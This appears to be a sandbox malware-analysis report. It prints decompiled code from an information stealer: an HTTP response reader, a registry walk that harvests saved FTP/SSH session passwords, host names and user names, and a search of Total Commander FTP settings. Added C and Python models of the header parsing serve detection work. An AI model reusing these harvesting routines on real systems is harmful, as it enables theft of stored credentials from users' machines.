                                                                                                                                        				char _t83;
                                                                                                                                        				void* _t88;
                                                                                                                                        				void* _t95;
                                                                                                                                        				intOrPtr* _t96;
                                                                                                                                        				intOrPtr* _t98;
                                                                                                                                        				void* _t104;
                                                                                                                                        				intOrPtr* _t107;
                                                                                                                                        				intOrPtr _t108;
                                                                                                                                        				intOrPtr* _t109;
                                                                                                                                        				void* _t112;
                                                                                                                                        				char _t113;
                                                                                                                                        				char* _t114;
                                                                                                                                        				void* _t117;
                                                                                                                                        				char _t120;
                                                                                                                                        				intOrPtr* _t140;
                                                                                                                                        				void* _t141;
                                                                                                                                        				char* _t142;
                                                                                                                                        				void* _t143;
                                                                                                                                        				intOrPtr* _t145;
                                                                                                                                        				char* _t146;
                                                                                                                                        				signed int _t147;
                                                                                                                                        				void* _t167;
                                                                                                                                        
				_t71 =  *0xbc10000; // 0xbb40e64e; /GS security cookie
				_v12 = _t71 ^ _t147; // cookie XOR frame pointer, verified again at return
				_v2092 = _a8; // IStream** out-parameter: receives a clone of the response stream
				_v2088 = _a12; // out-parameter for the Location header, when present
				_v2080 = LocalAlloc(0x40, 0x7d80); // LPTR: 32128-byte zeroed scratch buffer for the headers
				_t120 = 0;
				__imp__CreateStreamOnHGlobal(0, 1,  &_v2072); // fDeleteOnRelease = TRUE; the IStream* lands in _v2072
				do {
					_t140 = _a4; // socket
					_t144 = _v2072; // IStream*
					_v2068 = _t120; // flag: a '\n' has been seen
					_t77 = E0BC01885(_t140); // executed; socket helper, its body is not in this section
					_pop(_t122);
					if(_t77 != 0) {
						while(1) {
							_t78 = E0BC01885(_t140); // executed
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							_t79 =  &_v2073;
							__imp__#16(_t140, _t79, 1, _t120); // executed; ws2_32 ordinal 16 = recv(s, &_v2073, 1, 0): headers are read one byte at a time
							__eflags = _t79;
							if(_t79 < 0) {
								break;
							}
							__eflags = _v2073 - 0xa;
							if(_v2073 == 0xa) {
								_v2068 = 1; // '\n' seen
							}
							_t122 =  &_v2073;
							 *((intOrPtr*)( *_t144 + 0x10))(_t144,  &_v2073, 1, _t120); // IStream vtable +0x10 = ISequentialStream::Write: append the byte
							_t88 = E0BC089A1(_t144,  &_v2073);
							__eflags = _t88 - 0xfa00;
							if(_t88 >= 0xfa00) { // helper result is bounded at 0xfa00 (64000); its body is not in this section
								_t77 = _v2068;
								goto L2;
							} else {
								__eflags = _v2068 - _t120;
								if(_v2068 != _t120) {
									L3:
									if(E0BC089A1(_v2072, _t122) > 0xfa00) {
										break;
									}
									_t145 = _v2072;
									_t141 = 0;
									while(1) { // slide a 4-byte window over the stream looking for the end of the headers
										 *((intOrPtr*)( *_t145 + 0x14))(_t145, _t141, 0, _t120, _t120); // +0x14 = IStream::Seek(_t141, STREAM_SEEK_SET)
										_v2084 = _t120;
										 *((intOrPtr*)( *_t145 + 0xc))(_t145,  &_v2084, 4,  &_v2096); // +0xc = ISequentialStream::Read(4 bytes; bytes read in _v2096)
										_t141 = _t141 + 1;
										if(_v2084 == 0xa0d0a0d) { // little-endian "\r\n\r\n"
											break;
										}
										if(_v2096 != _t120) {
											continue;
										}
										_t95 = 0; // stream exhausted without a terminator: keep receiving
										goto L8;
									}
									_t54 = _t141 + 3; // 0x4; offset just past "\r\n\r\n", i.e. the header length
									_t95 = _t54;
									goto L8;
								}
								continue;
							}
						}
						L30:
						_t80 = _v2072;
						 *((intOrPtr*)( *_t80 + 8))(_t80); // +8 = IUnknown::Release on the stream
						E0BC08D3D(_v2080); // takes the LocalAlloc buffer on both exit paths; body not in this section
						L31:
						_t83 = 0;
						__eflags = 0;
						L32:
						return E0BC09FDC(_t83, _t120, _v12 ^ _t147, _t139, _t140, _t144); // stack-cookie check in the epilogue; _t83 is the return value
					}
					L2:
					if(_t77 == _t120) {
						goto L30;
					}
					goto L3;
					L8:
				} while (_t95 == _t120);
				_t96 = _v2072;
				_t139 =  *_t96;
				 *((intOrPtr*)( *_t96 + 0x14))(_t96, 0, _t120, _t120, _t120); // Seek back to offset 0
				_t98 = _v2072;
				 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v2080, 0x2134, _t120); // Read up to 0x2134 (8500) header bytes into the scratch buffer
				_v2068 = _t120; // reused from here on as the remaining body length
				_t146 = StrStrIA(_v2080, "Content-Length:"); // case-insensitive search
				if(_t146 == _t120) {
					L14:
					if(StrStrIA(_v2080, "Location:") == 0) { // the result is not shown assigned, but the scan at the end of this branch starts from _t146
						L21:
						_t144 = _v2072;
						E0BC08B39(_v2072); // stream helper; body not in this section
						if(_v2068 <= _t120) {
							_v2068 = 0xa00000; // no usable Content-Length: accept up to 10 MiB of body
						}
						_t140 = _v2072;
						_t104 = E0BC01885(_a4); // executed
						_pop(_t133);
						_t167 = _t104;
						while(_t167 != 0) {
							_t112 = E0BC01885(_a4); // executed
							_pop(_t133);
							if(_t112 != 0) {
								_t113 = 0x800;
								__eflags = _v2068 - 0x800;
								if(_v2068 <= 0x800) {
									_t113 = _v2068; // recv min(remaining, 0x800) bytes per call
								}
								_t114 =  &_v2064;
								__imp__#16(_a4, _t114, _t113, _t120); // executed; recv(s, &_v2064, _t113, 0)
								_t144 = _t114;
								__eflags = _t144 - _t120;
								if(__eflags < 0 || __eflags == 0) { // SOCKET_ERROR or connection closed
									break;
								} else {
									_t133 =  &_v2064;
									 *((intOrPtr*)( *_t140 + 0x10))(_t140,  &_v2064, _t144, _t120); // IStream::Write the received chunk
									_t61 =  &_v2068;
									 *_t61 = _v2068 - _t144; // remaining -= bytes received
									__eflags =  *_t61;
									continue;
								}
							}
							break;
						}
						if(E0BC089A1(_v2072, _t133) != 0) { // stream is non-empty
							_t107 = _v2072;
							_t108 =  *((intOrPtr*)( *_t107 + 0x34))(_t107, _v2092); // +0x34 = IStream::Clone: the caller gets its own copy through _a8
							__eflags = _t108;
							if(_t108 < 0) {
								goto L31;
							}
							_t120 = 1; // success
						}
						_t109 = _v2072;
						 *((intOrPtr*)( *_t109 + 8))(_t109); // Release the original stream
						E0BC08D3D(_v2080); // executed
						_t83 = _t120;
						goto L32;
					}
					_t117 = 0;
					while( *((char*)(_t117 + _t146)) != 0xd) { // scan to the end of the Location line, at most 0x1194 (4500) bytes
						_t117 = _t117 + 1;
						if(_t117 < 0x1194) {
							continue;
						}
						break;
					}
					_t142 = _t117 + _t146;
					 *_t142 = _t120; // NUL-terminate at the CR
					if(_v2088 != _t120) {
						 *_v2088 = E0BC091E5(_t146); // hand the Location line to the caller through _a12
					}
					 *_t142 = 0xd; // restore the CR
					goto L21;
				}
				_t146 =  &(_t146[0x10]); // skip "Content-Length:" plus one space (16 bytes)
				_t143 = 0;
				while( *((char*)(_t143 + _t146)) != 0xd) { // scan to the CR, at most 0x1194 (4500) bytes
					_t143 = _t143 + 1;
					if(_t143 < 0x1194) {
						continue;
					}
					break;
				}
				 *((char*)(_t143 + _t146)) = _t120; // NUL-terminate
				_v2068 = StrToIntA(_t146); // Content-Length value becomes the remaining body length
				 *((char*)(_t143 + _t146)) = 0xd;
				goto L14;
			}
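The routine above is the sample's HTTP response reader: it pulls header bytes off the socket one at a time into an IStream, searches for the "\r\n\r\n" terminator with a 4-byte window, extracts Content-Length (skipping a fixed 16 bytes) and Location, falls back to a 10 MiB body cap when Content-Length is missing or not positive, and bounds each line scan at 0x1194 bytes. The following is an added example, not code from the sample or from this report, that re-implements that header handling over an in-memory buffer so the behaviour can be checked without a socket. Function and constant names (strstr_ci, find_header_end, scan_to_cr, parse_response, check_samples, LOCATION_MAX), the two sample responses and the example.invalid host are this example's own; keeping only the value after "Location:" is an assumption, since the helper E0BC091E5 that receives that line is not shown here. Unlike the sample, every scan here is also bounded by the buffer length.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define HDR_LINE_LIMIT   0x1194   /* 4500: the sample's bound on the scan for '\r' */
#define DEFAULT_BODY_CAP 0xa00000 /* 10 MiB: body cap when Content-Length is absent or <= 0 */
#define HEADER_COPY_MAX  0x2134   /* 8500: header bytes the sample copies out before parsing */
#define LOCATION_MAX     2048     /* assumption, not a constant taken from the sample */

struct http_resp {
    size_t header_len;           /* bytes up to and including "\r\n\r\n" */
    long content_length;         /* -1 when no Content-Length header */
    long body_cap;               /* bytes the sample's body loop would accept */
    char location[LOCATION_MAX]; /* Location value, "" if absent */
};

/* Case-insensitive, length-bounded substring search (StrStrIA's role). */
static const char *strstr_ci(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++) {
        size_t k = 0;
        while (k < m && tolower((unsigned char)hay[i + k]) == tolower((unsigned char)needle[k])) k++;
        if (k == m) return hay + i;
    }
    return NULL;
}

/* Offset just past "\r\n\r\n", or -1; the sample's 4-byte window compares against 0x0a0d0a0d. */
static long find_header_end(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(buf + i, "\r\n\r\n", 4) == 0) return (long)(i + 4);
    return -1;
}

/* Bytes from p up to the next '\r', capped at HDR_LINE_LIMIT like the sample. */
static size_t scan_to_cr(const char *p, size_t avail)
{
    size_t i = 0;
    while (i < avail && i < HDR_LINE_LIMIT && p[i] != '\r') i++;
    return i;
}

int parse_response(const uint8_t *buf, size_t n, struct http_resp *out)
{
    memset(out, 0, sizeof *out);
    out->content_length = -1;
    long end = find_header_end(buf, n);
    if (end < 0) return -1;                       /* sample: no terminator, give up */
    out->header_len = (size_t)end;
    const char *hdr = (const char *)buf;
    size_t hn = out->header_len < HEADER_COPY_MAX ? out->header_len : HEADER_COPY_MAX;

    const char *cl = strstr_ci(hdr, hn, "Content-Length:");
    if (cl && (size_t)(cl - hdr) + 16 <= hn) {
        /* The sample skips a fixed 16 bytes (strlen("Content-Length:") + 1), so it
         * assumes exactly one space before the digits; mirrored here. */
        const char *v = cl + 16;
        size_t len = scan_to_cr(v, hn - (size_t)(v - hdr));
        char tmp[32] = {0};
        memcpy(tmp, v, len < sizeof tmp - 1 ? len : sizeof tmp - 1);
        out->content_length = strtol(tmp, NULL, 10);   /* StrToIntA */
    }
    const char *loc = strstr_ci(hdr, hn, "Location:");
    if (loc) {
        /* The sample NUL-terminates this line at '\r' and passes it to E0BC091E5, which
         * is not visible here; keeping only the value after "Location:" is an assumption. */
        size_t len = scan_to_cr(loc, hn - (size_t)(loc - hdr));
        const char *v = loc + 9;
        while (v < loc + len && *v == ' ') v++;
        size_t vlen = (size_t)(loc + len - v);
        if (vlen >= LOCATION_MAX) vlen = LOCATION_MAX - 1;
        memcpy(out->location, v, vlen);
        out->location[vlen] = '\0';
    }
    out->body_cap = out->content_length > 0 ? out->content_length : DEFAULT_BODY_CAP;
    return 0;
}

/* Constructed sample responses; the host name is an RFC 2606 reserved one. */
static const char SAMPLE_REDIRECT[] = "HTTP/1.1 302 Found\r\nLocation: http://example.invalid/next\r\n"
                                      "Content-Length: 5\r\n\r\nhello";
static const char SAMPLE_NO_LENGTH[] = "HTTP/1.1 200 OK\r\nServer: test\r\n\r\nabc";

/* 0 when both samples parse as expected, otherwise the number of the failed step. */
int check_samples(void)
{
    struct http_resp r;
    if (parse_response((const uint8_t *)SAMPLE_REDIRECT, sizeof SAMPLE_REDIRECT - 1, &r) != 0) return 1;
    if (r.header_len != sizeof SAMPLE_REDIRECT - 1 - 5 || r.content_length != 5 || r.body_cap != 5) return 2;
    if (strcmp(r.location, "http://example.invalid/next") != 0) return 3;
    if (parse_response((const uint8_t *)SAMPLE_NO_LENGTH, sizeof SAMPLE_NO_LENGTH - 1, &r) != 0) return 4;
    if (r.content_length != -1 || r.body_cap != DEFAULT_BODY_CAP || r.location[0] != '\0') return 5;
    if (r.header_len != sizeof SAMPLE_NO_LENGTH - 1 - 3) return 6;
    return 0;
}
```

Two details worth noticing when writing detections or an emulator for this loader: the 16-byte skip means a response with no space, or more than one space, after "Content-Length:" yields a length of 0, which the sample then replaces with the 10 MiB cap; and because the line scans run to '\r' only, a header block without CR characters is walked for up to 4500 bytes.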
                                                                                                                                        0x0bc018fb
                                                                                                                                        0x0bc01902
                                                                                                                                        0x0bc0190b
                                                                                                                                        0x0bc0191b
                                                                                                                                        0x0bc01927
                                                                                                                                        0x0bc01936
                                                                                                                                        0x0bc01939
                                                                                                                                        0x0bc0193f
                                                                                                                                        0x0bc0193f
                                                                                                                                        0x0bc01942
                                                                                                                                        0x0bc01949
                                                                                                                                        0x0bc0194f
                                                                                                                                        0x0bc01954
                                                                                                                                        0x0bc01957
                                                                                                                                        0x0bc01b12
                                                                                                                                        0x0bc01b13
                                                                                                                                        0x0bc01b19
                                                                                                                                        0x0bc01b1b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01ac3
                                                                                                                                        0x0bc01acb
                                                                                                                                        0x0bc01ad1
                                                                                                                                        0x0bc01ad3
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01ad5
[Control-flow graph node list for this function: basic-block addresses in the range 0x0bc0195d to 0x0bc01bf4 (zero entries for unresolved edges); the rendered graph itself is not reproduced here]

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00007D80,00000000,00000000,00000000), ref: 0BC01921
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC01939
                                                                                                                                          • Part of subcall function 0BC01885: select.WS2_32(00000000,?,00000000,00000000,?), ref: 0BC018D0
                                                                                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 0BC01A09
                                                                                                                                        • StrToIntA.SHLWAPI(-00000010), ref: 0BC01A2D
                                                                                                                                        • StrStrIA.SHLWAPI(?,Location:), ref: 0BC01A48
                                                                                                                                        • recv.WS2_32(00000000,?,00000001,00000000), ref: 0BC01ACB
                                                                                                                                        • recv.WS2_32(00000000,?,00000800,00000000), ref: 0BC01B78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: recv$AllocCreateGlobalLocalStreamselect
                                                                                                                                        • String ID: Content-Length:$Location:
                                                                                                                                        • API String ID: 2711603718-2400408565
                                                                                                                                        • Opcode ID: c5e3c96dd09edf784c9f246261aa46f8be94373a983e330611ac675507075b20
                                                                                                                                        • Instruction ID: 8afb9989686e166e127df99691713af7404f3755cc9b947933963004c0a99eff
                                                                                                                                        • Opcode Fuzzy Hash: c5e3c96dd09edf784c9f246261aa46f8be94373a983e330611ac675507075b20
                                                                                                                                        • Instruction Fuzzy Hash: BE914D71A20119AFDB249F64CC44BAAB7F8FF04704F0885E9F559A7180DF709E828FA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%
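The API sequence listed above (a recv loop with a 1-byte buffer, StrStrIA on "Content-Length:" and "Location:", StrToIntA, then recv with a 0x800-byte buffer) is the shape of a minimal raw-socket HTTP response reader: headers are pulled one byte at a time so the reader can stop exactly at the blank line, the body length and any redirect target are lifted out of the header text, and the body is read in 0x800-byte chunks. The following Python model of that call sequence is an added example written for this page, not code from the sample or from Joe Sandbox; the socket, the responses and the "loop until the advertised length" behaviour are constructed assumptions made so it runs offline. It is the kind of model an analyst writes before standing up a decoy server or describing the traffic for a detection.

```python
"""Model of the HTTP response reader implied by the API trace
(recv 1 byte, StrStrIA "Content-Length:" / "Location:", StrToIntA,
recv 0x800).  Editor-written example; the sample's own code is not
reproduced and the socket is simulated over constructed bytes."""
import io
import re

CHUNK = 0x800  # size of the second recv() in the trace (body reads)


class FakeSocket:
    """Stand-in for a WS2_32 socket: recv(n) returns at most n bytes."""

    def __init__(self, data: bytes):
        self._buf = io.BytesIO(data)

    def recv(self, n: int) -> bytes:
        return self._buf.read(n)


def read_headers(sock) -> bytes:
    """Pull one byte per recv() until the blank line that ends the header
    block, mirroring recv(sock, buf, 1, 0) in the trace."""
    hdr = bytearray()
    while not hdr.endswith(b"\r\n\r\n"):
        b = sock.recv(1)
        if not b:  # peer closed early: return what we have
            break
        hdr += b
    return bytes(hdr)


def find_header_value(headers: bytes, name: bytes):
    """Case-insensitive substring search like StrStrIA: matches the first
    occurrence of `name` anywhere in the block, not only at a line start."""
    i = headers.lower().find(name.lower())
    if i < 0:
        return None
    rest = headers[i + len(name):]
    return rest.split(b"\r\n", 1)[0].strip()


def str_to_int(value) -> int:
    """Approximation of StrToIntA: optional sign plus leading decimal
    digits, 0 when there is nothing to parse."""
    if value is None:
        return 0
    m = re.match(rb"[+-]?\d+", value)
    return int(m.group()) if m else 0


def parse_response(sock) -> dict:
    """Read headers byte-wise, then the body in CHUNK-sized recv() calls
    until the advertised Content-Length is reached (assumed loop bound)."""
    headers = read_headers(sock)
    length = str_to_int(find_header_value(headers, b"Content-Length:"))
    location = find_header_value(headers, b"Location:")
    body = bytearray()
    while len(body) < length:
        chunk = sock.recv(CHUNK)
        if not chunk:
            break
        body += chunk
    return {
        "length": length,
        "location": location.decode("latin-1") if location is not None else None,
        "body": bytes(body[:length]),
    }


# Constructed responses for the example (not captured traffic).
REDIRECT = (b"HTTP/1.1 302 Found\r\n"
            b"location: http://example.invalid/next\r\n"
            b"Content-Length: 0\r\n\r\n")
PAYLOAD = (b"HTTP/1.1 200 OK\r\n"
           b"Server: x\r\n"
           b"CONTENT-LENGTH: 5\r\n\r\n"
           b"helloEXTRA")
# A header value containing the literal text "Content-Length:" before the
# real header: a substring search picks the wrong one.
TRICKY = (b"HTTP/1.1 200 OK\r\n"
          b"X-Note: Content-Length: 99\r\n"
          b"Content-Length: 5\r\n\r\n"
          b"hello")

if __name__ == "__main__":
    for name, raw in (("redirect", REDIRECT), ("payload", PAYLOAD), ("tricky", TRICKY)):
        print(name, parse_response(FakeSocket(raw)))
```

Because StrStrIA is a plain case-insensitive substring search, the model (like the trace) takes the first "Content-Length:" anywhere in the block, which the third constructed response exercises; a decoy server that wants to steer such a loader can rely on that, and a detection that expects strict header parsing cannot.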

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                        			E0BC0460A(void* __edx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v2056;
                                                                                                                                        				intOrPtr _v2060;
                                                                                                                                        				intOrPtr _v2064;
                                                                                                                                        				void* _v2068;
                                                                                                                                        				intOrPtr _v2072;
                                                                                                                                        				intOrPtr _v2076;
                                                                                                                                        				char* _v2080;
                                                                                                                                        				char _v2084;
                                                                                                                                        				intOrPtr _v2088;
                                                                                                                                        				char _v2092;
                                                                                                                                        				char _v2096;
                                                                                                                                        				void* _v2100;
                                                                                                                                        				intOrPtr _v2104;
                                                                                                                                        				char _v2108;
                                                                                                                                        				char _v2112;
                                                                                                                                        				char* _v2116;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t64;
                                                                                                                                        				char* _t66;
                                                                                                                                        				long _t67;
                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                        				char* _t89;
                                                                                                                                        				void* _t116;
                                                                                                                                        				void* _t123;
                                                                                                                                        				intOrPtr _t124;
                                                                                                                                        				void* _t125;
                                                                                                                                        				signed int _t127;
                                                                                                                                        				void* _t128;
                                                                                                                                        				void* _t129;
                                                                                                                                        				void* _t130;
                                                                                                                                        
                                                                                                                                        				_t123 = __edx;
                                                                                                                                        				_t64 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t64 ^ _t127;
                                                                                                                                        				_t66 = _a12;
                                                                                                                                        				_t116 = _a8;
                                                                                                                                        				_t124 = _a4;
                                                                                                                                        				_t119 =  &_v2068;
                                                                                                                                        				_v2100 = _t116;
                                                                                                                                        				_v2116 = _t66;
                                                                                                                                        				_t67 = RegOpenKeyA(_t116, _t66,  &_v2068); // executed
                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                        					_push(_t125);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push( &_v2092);
                                                                                                                                        					_push( &_v2056);
                                                                                                                                        					_v2084 = 0;
                                                                                                                                        					_push(0);
                                                                                                                                        					while(1) {
                                                                                                                                        						_v2092 = 0x7ff;
                                                                                                                                        						if(RegEnumKeyExA(_v2068, ??, ??, ??, ??, ??, ??, ??) != 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						_v2064 = E0BC08EE2("\\", _v2116);
                                                                                                                                        						_v2060 = E0BC08EE2( &_v2056, _t73);
                                                                                                                                        						E0BC08D3D(_v2064);
                                                                                                                                        						_v2072 = E0BC08EBD(_t116, _v2060, "Password", 0);
                                                                                                                                        						_v2088 = E0BC08EBD(_t116, _v2060, "HostName", 0);
                                                                                                                                        						_v2076 = E0BC08EBD(_t116, _v2060, "UserName", 0);
                                                                                                                                        						_v2064 = E0BC08EBD(_t116, _v2060, "RemoteDirectory", 0);
                                                                                                                                        						_t86 = E0BC08DDA(0,  *0xbc10010, _v2060, "PortNumber",  &_v2112, 0);
                                                                                                                                        						_t129 = _t128 + 0x50;
                                                                                                                                        						if(_t86 == 0) {
                                                                                                                                        							L6:
                                                                                                                                        							_v2104 = 0x15;
                                                                                                                                        						} else {
                                                                                                                                        							_push(_t86);
                                                                                                                                        							if(_v2112 != 4) {
                                                                                                                                        								E0BC08D3D();
                                                                                                                                        								_pop(_t119);
                                                                                                                                        								goto L6;
                                                                                                                                        							} else {
                                                                                                                                        								_v2104 =  *_t86;
                                                                                                                                        								E0BC08D3D();
                                                                                                                                        								_pop(_t119);
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						_t89 = E0BC08EBD(_t116, _v2060, "FSProtocol",  &_v2108);
                                                                                                                                        						_t130 = _t129 + 0xc;
                                                                                                                                        						_v2080 = _t89;
                                                                                                                                        						if(_t89 == 0) {
                                                                                                                                        							_v2080 = " ";
                                                                                                                                        						}
                                                                                                                                        						if(_v2072 != 0 && _v2088 != 0 && _v2076 != 0) {
                                                                                                                                        							_v2096 = 0xbeef0010;
                                                                                                                                        							E0BC08A41( &_v2096, _t119, _t124, 4);
                                                                                                                                        							E0BC08C6D(_t124, _t119, _v2088);
                                                                                                                                        							E0BC08C6D(_t124, _t119, _v2076);
                                                                                                                                        							E0BC08C6D(_t124, _t119, _v2072);
                                                                                                                                        							E0BC08C37(_v2104);
                                                                                                                                        							E0BC08C6D(_t124, _t119, _v2064);
                                                                                                                                        							_t110 = _v2080;
                                                                                                                                        							_t130 = _t130 + 0x14;
                                                                                                                                        							if(_v2080 == 0 || _v2108 != 4) {
                                                                                                                                        								_v2096 = 0;
                                                                                                                                        								E0BC08A41( &_v2096, _t119, _t124, 4);
                                                                                                                                        								_pop(_t119);
                                                                                                                                        							} else {
                                                                                                                                        								E0BC08C37( *_t110);
                                                                                                                                        							}
                                                                                                                                        							_t116 = _v2100;
                                                                                                                                        						}
                                                                                                                                        						E0BC08D3D(_v2072);
                                                                                                                                        						E0BC08D3D(_v2088);
                                                                                                                                        						E0BC08D3D(_v2076);
                                                                                                                                        						E0BC08D3D(_v2064);
                                                                                                                                        						E0BC08D3D(_v2080);
                                                                                                                                        						E0BC0460A(_t123, _t124, _t116, _v2060);
                                                                                                                                        						E0BC08D3D(_v2060);
                                                                                                                                        						_t128 = _t130 + 0x24;
                                                                                                                                        						_v2084 = _v2084 + 1;
                                                                                                                                        						_push(0);
                                                                                                                                        						_push(0);
                                                                                                                                        						_push(0);
                                                                                                                                        						_push(0);
                                                                                                                                        						_push( &_v2092);
                                                                                                                                        						_push( &_v2056);
                                                                                                                                        						_push(_v2084);
                                                                                                                                        					}
                                                                                                                                        					_t67 = RegCloseKey(_v2068);
                                                                                                                                        					_pop(_t125);
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t67, _t116, _v8 ^ _t127, _t123, _t124, _t125);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0463D
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC048B5
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC048C9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                                                                                        • API String ID: 1332880857-3874328862
                                                                                                                                        • Opcode ID: cc475e273ce474d4b1fc27d3aab242bb528d2ddde4654feef402817de87d86d6
                                                                                                                                        • Instruction ID: 0dba3c37e7fd98be62edc1055bf2c71f5a5a4c57ea406983558d7b88087071e2
                                                                                                                                        • Opcode Fuzzy Hash: cc475e273ce474d4b1fc27d3aab242bb528d2ddde4654feef402817de87d86d6
                                                                                                                                        • Instruction Fuzzy Hash: D3610F70921228DECF61AF54CC41ADEBAF9FF04650F00C5E5E599A2290DE315A94DFE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 12.89%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                        			E0BC0441F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __esi;
                                                                                                                                        				intOrPtr _t16;
                                                                                                                                        				CHAR* _t17;
                                                                                                                                        				int _t18;
                                                                                                                                        				void* _t20;
                                                                                                                                        				void* _t22;
                                                                                                                                        				void* _t23;
                                                                                                                                        				void* _t24;
                                                                                                                                        				void* _t26;
                                                                                                                                        				intOrPtr _t29;
                                                                                                                                        				void* _t31;
                                                                                                                                        				void* _t34;
                                                                                                                                        				void* _t35;
                                                                                                                                        				intOrPtr _t37;
                                                                                                                                        				void* _t38;
                                                                                                                                        				void* _t40;
                                                                                                                                        				void* _t65;
                                                                                                                                        				void* _t66;
                                                                                                                                        				void* _t67;
                                                                                                                                        				long _t70;
                                                                                                                                        				void* _t81;
                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                        				void* _t84;
                                                                                                                                        				void* _t85;
                                                                                                                                        				void* _t86;
                                                                                                                                        				void* _t87;
                                                                                                                                        
                                                                                                                                        				_push(__ecx);
                                                                                                                                        				_push(__ecx);
                                                                                                                                        				_t59 = _a4;
                                                                                                                                        				_t64 = _a4;
                                                                                                                                        				_t16 = E0BC08C9C(_a4, __edx, __eflags, 2);
                                                                                                                                        				 *_t83 = 0x185;
                                                                                                                                        				_v12 = _t16;
                                                                                                                                        				_t17 = LocalAlloc(0x40, _t70);
                                                                                                                                        				_t71 = _t17;
                                                                                                                                        				_t18 = GetWindowsDirectoryA(_t17, 0x104);
                                                                                                                                        				if(_t18 == 0 || _t18 > 0x104) {
                                                                                                                                        					E0BC08D3D(_t71);
                                                                                                                                        				} else {
                                                                                                                                        					E0BC042C9(_t64, _t59, _t71); // executed
                                                                                                                                        				}
                                                                                                                                        				_pop(_t65);
                                                                                                                                        				_t20 = E0BC091BE(0x28); // executed
                                                                                                                                        				E0BC042C9(_t65, _t59, _t20); // executed
                                                                                                                                        				_t22 = E0BC091BE(0x1a);
                                                                                                                                        				_t84 = _t83 + 0x10;
                                                                                                                                        				_t77 = "\\GHISLER";
                                                                                                                                        				if(_t22 != 0) {
                                                                                                                                        					E0BC042C9(_t65, _t59, E0BC08F32(_t22, "\\GHISLER")); // executed
                                                                                                                                        					_t84 = _t84 + 0x10;
                                                                                                                                        				}
                                                                                                                                        				_t23 = E0BC091BE(0x23);
                                                                                                                                        				_pop(_t66);
                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                        					E0BC042C9(_t66, _t59, E0BC08F32(_t23, _t77)); // executed
                                                                                                                                        					_t84 = _t84 + 0x10;
                                                                                                                                        				}
                                                                                                                                        				_t24 = E0BC091BE(0x1c);
                                                                                                                                        				_pop(_t67);
                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                        					E0BC042C9(_t67, _t59, E0BC08F32(_t24, _t77)); // executed
                                                                                                                                        					_t84 = _t84 + 0x10;
                                                                                                                                        				}
                                                                                                                                        				_t72 = "InstallDir";
                                                                                                                                        				_t26 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
                                                                                                                                        				E0BC042C9(_t67, _t59, _t26);
                                                                                                                                        				_t60 = "FtpIniName";
                                                                                                                                        				_t29 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                                                                                        				_t85 = _t84 + 0x20;
                                                                                                                                        				_v8 = _t29;
                                                                                                                                        				if(_t29 != 0) {
                                                                                                                                        					E0BC042B1(_a4, _t29);
                                                                                                                                        					E0BC08D3D(_v8);
                                                                                                                                        					_t85 = _t85 + 0xc;
                                                                                                                                        				}
                                                                                                                                        				_t31 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Total Commander", _t72, 0); // executed
                                                                                                                                        				E0BC042C9(_t67, _a4, _t31);
